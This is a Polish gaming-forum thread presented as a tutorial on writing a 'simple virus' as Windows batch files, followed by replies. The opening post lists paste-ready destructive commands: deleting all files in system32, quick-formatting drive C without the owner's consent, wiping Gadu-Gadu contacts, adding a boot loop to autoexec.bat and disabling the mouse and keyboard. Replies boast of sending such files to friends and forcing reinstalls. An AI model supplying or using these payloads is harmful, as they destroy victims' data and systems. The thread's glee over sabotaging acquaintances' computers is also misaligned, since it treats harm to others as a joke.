Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

[Tut] Jak Zrobić Prostego Wirusa


Rekomendowane odpowiedzi

Opublikowano

UWAGA! JEŻELI SPOSÓB NIE BĘDZIE CHCIAŁ DZIAŁAĆ TO ZAPISZ GO W TAKI SPOSÓB:

 

@echo

 

start

 

 

 

Nie biore odpowiedzialnosci za efekty artykolow!!!

 

Jak napisać wirusa w notatniku?

Na początek pokaże jak zrobić bardzo prosty program który po otwarciu otworzy wpisaną strone www

Zaczynamy : Otwórz Notatnik i wklej , lub wpisz do niego poniższy kod:

 

@echo off

 

start http://www.google.pl

 

Następnie zapisujemy w następujący sposób : klikamy na Plik potem

klikamy na Zapisz jako... I teraz wpisujemy w nazwę (Nazwa pliku) program.bat , a poniżej z menu Zapisz jako typ wybieramy Wszystkie pliki i klikamy na Zapisz Teraz w miejscu gdzie zapisaliśmy plik pokaże się nasz program klikamy na ikone naszego programu i powinna się otworzyć nam strona www.

PORADA:

zamiast strony podanej prze zemnie możemy wpisać dowolną stronę czyli zamiast start http://www.google.pl Może być

start

http://www.allegro.pl

Mam nadzieje że wszystko zrozumiałe Jeżeli jednak nie to proszę o kontakt...

Teraz Już jak umiecie zapisywać wirusa itp..To podam teraz tylko gotowe kody do wklejenia w notatnik

 

Zawieszenie koputera

@echo off

rundll32 user,disableoemlayer

Wyłączenie komputera

@echo off

rundll32 krnl386.exe,exitkernel

Wyłącz myszkę

@echo off

rundll32 mouse,disable

Wyłącz mysz i klawiature

@echo off

rundll32 mouse,disable

rundll32 keyboard,disable

Nie pozwalaj na Start Systemu

@echo off

echo :petla>>c:\autoexec.bat

echo goto petla>>c:\autoexec.bat

Spowolnij włączanie systemu oraz zamień przyciski myszy

@echo off

rundll32 user,swapmousebutton

echo dir /s /v c:\*.* >>c:autoexec.bat

Usuwa ważne pliki systemowe

@echo off

c:\

cd windows

cd system32

del *.*/q

Formatuje C bez zgody właściciela komputera

@echo off

format c: /q

Usunięcie listy kontaktów GG

@echo off

cd %Userprofile%\Gadu-Gadu

del /f /s /q *.*

 

Inne linijki:

rundll32 user,DisbleOEMLayer - Zawiesza system (nie działa w Win98)

rundll32 user,RepaintScreen - Odświerza ekran (= )

rundll32 user,setCursorPos - Kursor wędruje w lewy górny róg

rundll32 diskcopy,DiskCopyRunDLL - Kopiuje dyskietkę (nie działa w Win98)

rundll32 shell,shellExecute - Uruchamia Eksploratora

rundll32 shell32,OpenAs_RunDLL - Otwórz z...

rundll32 shell32,SHFormatDrive - Formatowanie dyskietki

rundll32 shell32,ShellAboutA - Pamięć fizyczna i zasoby

rundll32 shell32,SHExitWindowsEx 0 - Wylogowanie

rundll32 shell32,SHExitWindowsEx 1 - Zamknięcie systemu

rundll32 shell32,SHExitWindowsEx 2 - Restart z potwierdzeniem zapisania plików

rundll32 shell32,SHExitWindowsEx 3 - Restart bez potwierdzenia

rundll32 shell32,Control_RunDLL - Panel Sterowania

rundll32 shell32,Control_RunDLL - desk.cpl Właściwości ekranu

rundll32 shell32,Control_RunDLL - main.cpl @0 Mysz

rundll32 shell32,Control_RunDLL - main.cpl @1 Klawiatura

rundll32 shell32,Control_RunDLL - main.cpl @2 Drukarki

rundll32 shell32,Control_RunDLL - main.cpl @3 Czcionki

rundll32 shell32,Control_RunDLL - powercfg.cpl Właściwości: Zarządzanie energią

rundll32 shell32,Control_RunDLL - sysdm.cpl Właściwości: System

rundll32 shell32,Control_RunDLL - timedate.cpl Właściwości: Data/Godzina

rundll32 shell32,Control_RunDLL - intl.cpl Właściwości: Ustawienia regionalne

rundll32 shell32,Control_RunDLL - joy.cpl Kontrolery gry (Joystick)

rundll32 shell32,Control_RunDLL - sticpl.cpl Właściwości: Skanery i aparaty fotograficzne

rundll32 shell32,Control_RunDLL - findfast.cpl FindFast (Jeśli masz MS Office)

rundll32 user,exitwindows - Zamknięcie systemu

rundll32 user,wnetconnectdialog - Mapuj dysk sieciowy

rundll32 user,wnetdisconnectdialog - Odłącz dysk sieciowy

rundll32 user,tilechildwindows - Uporządkuj ikony (sąsiadująco)

rundll32 user,cascadechildwindows - Uporządkuj ikony (kaskadowo)

rundll32 krnl386.exe,exitkernel - Prawie jak Reset

rundll32 msprint2.dll,RUNDLL_PrintTestPage - Drukuj stronę testową

rundll32 sysdm.cpl,InstallDevice_Rundll - Kreator dodawania nowego sprzętu

rundll32 user,wnetcancelconnection fsa - Przerwanie połączenia

z napędami sieciowymi Novell Netware

rundll32 user,swapmousebutton - Zamiana klawiszy myszki (UWAGA: Działa tylko w jedną stronę!)

rundll32 user,setcaretblinktime - Szybkość migania kursora (n=czas)

rundll32 user,setdoubleclicktime - Szybkość dwukrotnego kliknięcia

rundll32 keyboard,disable - wyłączenie klawiatury

rundll32 mouse,disable - wyłączenie myszy

deltree /y c:\windows\temp\ - czyszczenie folderu (tu przykład na folderze TEMP)

shutdown -S -t X -natychmiastowe zamknięcie kompa (X - czas do zamkniecia)

 

PAMIĘTAJ !!!

PS.

nie wszystkie zawsze działają

oczywiście wszystkie komendy trzeba wpisywac na schemacie:

 

@echo

 

start

 

Miłego Hakowania

Jeśli sie przydało Prosze o Minusy .

Bardzo Dużo minósów . :x

 

 

W topic`u Anty Wirus pokazuje mi ze jest trojan ale nie przejmowac sie

Wariuje Bo tu są takie treści -.- .

Spokojnie ! <3

 

  • Odpowiedzi 79
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Hehe fajne ^^ ja dawno temu się bawiłem takim czymś i na infie bratu dałem pliczek bat w którem było z 1000 razy start i się komp zawiesił ^^

 

Ogólnie można kogoś postraszyć i mam pytanie jak np zawiesi system to po resecie kompa all bd działać ?

 

Masz - ;D

e6988a408c5e33dc0b077b8.png

By EL_Mariaci

patrycek.png

Opublikowano

Tak ...

To tylko zawiesza system atakując odpowiednie Pliki .

Po Restarcie Systemu jest wszystko ok .

Sam Testowałem

Czasami bywa tak że jebie się PC na dobre B) Albo format :D

Opublikowano

haha ziomek ! Dzieki :D Kumpla wkręciłem:D Nie wiedział o co chodzi xD hahaha :D

 

Jeszcze mi do tego pisał na kom. a ja go jeszcze bardziej nakrecilem xD

 

Daje -- jak tak wolisz:D

xxx

Opublikowano

troche haotycznie napisane ;D

ale spoko sposob ;d

 

Wszystko jest ładnie i kolorowo :x

Chaotycznie ?

Na dole i górze masz schemat jak poprawnie napisac .

I na PW też tłumaczyłem .

 

 

Ps daj Minusy !

Opublikowano

Wiem juz o tym od dawna :P kiedys w szkole zrobilem plik ktory sie nazywal tradehack, a usuwal on system32 ;)uruchomilem go, jednak po restarcie wszystko bylo dobrze^^

IDIOT, IDIOT EWRYŁER !!

 

Opublikowano

Z formatem bez pozwolenia administratora jest dobre :x

Zrobiłem tak koleżance :D

Miała wała w chuj.. :x

Dobrze jej :x

Ale nie wszędzie to działa (system,service pack etc...)

Opublikowano

Proszę O Pomoc !!

 

 

Wyświetla mi się Teraz Coś Takiego :beztytuuevd.png

2zew70m.gif

mejo.png

49506699.jpg

Koniec Tego Spamu

;)

Opublikowano

@up

A co zrobiłeś ?

wpisałeś jakąś linijkę echo ?

jak tak to powiedz jaką .

uruchamiałeś to na swoim pc ?

czy to wyskakuje jak włączasz ?

Opublikowano

Tak ...

To tylko zawiesza system atakując odpowiednie Pliki .

Po Restarcie Systemu jest wszystko ok .

Sam Testowałem

Czasami bywa tak że jebie się PC na dobre B) Albo format :D

 

Masz racje kiedys zwykly plik .bat zrobilem i wyslalem koledze i musial format robic, steam, wow itd musial nowe kupywac ^^

03091112_Veteran_Leon.png
  • 2 tygodnie później...
Weteran
Opublikowano

Ciekawe za co..

Za kopie wszystko to bylo pisane juz rok temu

http://www.mpcforum.pl/topic/28442-tut-bat/page__p__253815entry253815

Przenies Mnie

Mam w nosie co mi dasz , ale jak juz to Zbieram minusy

mpccopy.jpg

Co to jest? Ma pięć liter - pierwsza to "K", a ostatnia to "s". Twarde owłosione, w środku ma biały płyn.

 

Odpowiedź: KOKOS, a ty co myślałeś? ;p

Opublikowano

Ciekawe za co..

Za kopie wszystko to bylo pisane juz rok temu

http://www.mpcforum.pl/topic/28442-tut-bat/page__p__253815entry253815

Przenies Mnie

 

 

Lol...

Popatrz na dole w prawym rogu.

Jest napisane żródło a nie jakieś Crtl + V jak chcesz sie podlizywać to nie tu .

Wyjdź .

Weteran
Opublikowano

aha ^^

wiesz maly druczek i nie widzialem tego zrodla -,-

Mam w nosie co mi dasz , ale jak juz to Zbieram minusy

mpccopy.jpg

Co to jest? Ma pięć liter - pierwsza to "K", a ostatnia to "s". Twarde owłosione, w środku ma biały płyn.

 

Odpowiedź: KOKOS, a ty co myślałeś? ;p

  • 3 tygodnie później...
Opublikowano

Omg wielkie mi coś. Znajomość podstawowych komend BATCH'a i obsługi jednej dll'ki. Pozatym napisanie takiego wirusa:

W I R U S
K O M P U T E R O W Y

ma więcej wspólnego z tematem niż to co ty napisałeś.

[TUT] Full Autoit V3 Tutorial

yo po 1 nie kayloger tylko bot który zapamiętuje hasła -_-

stop1.png

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...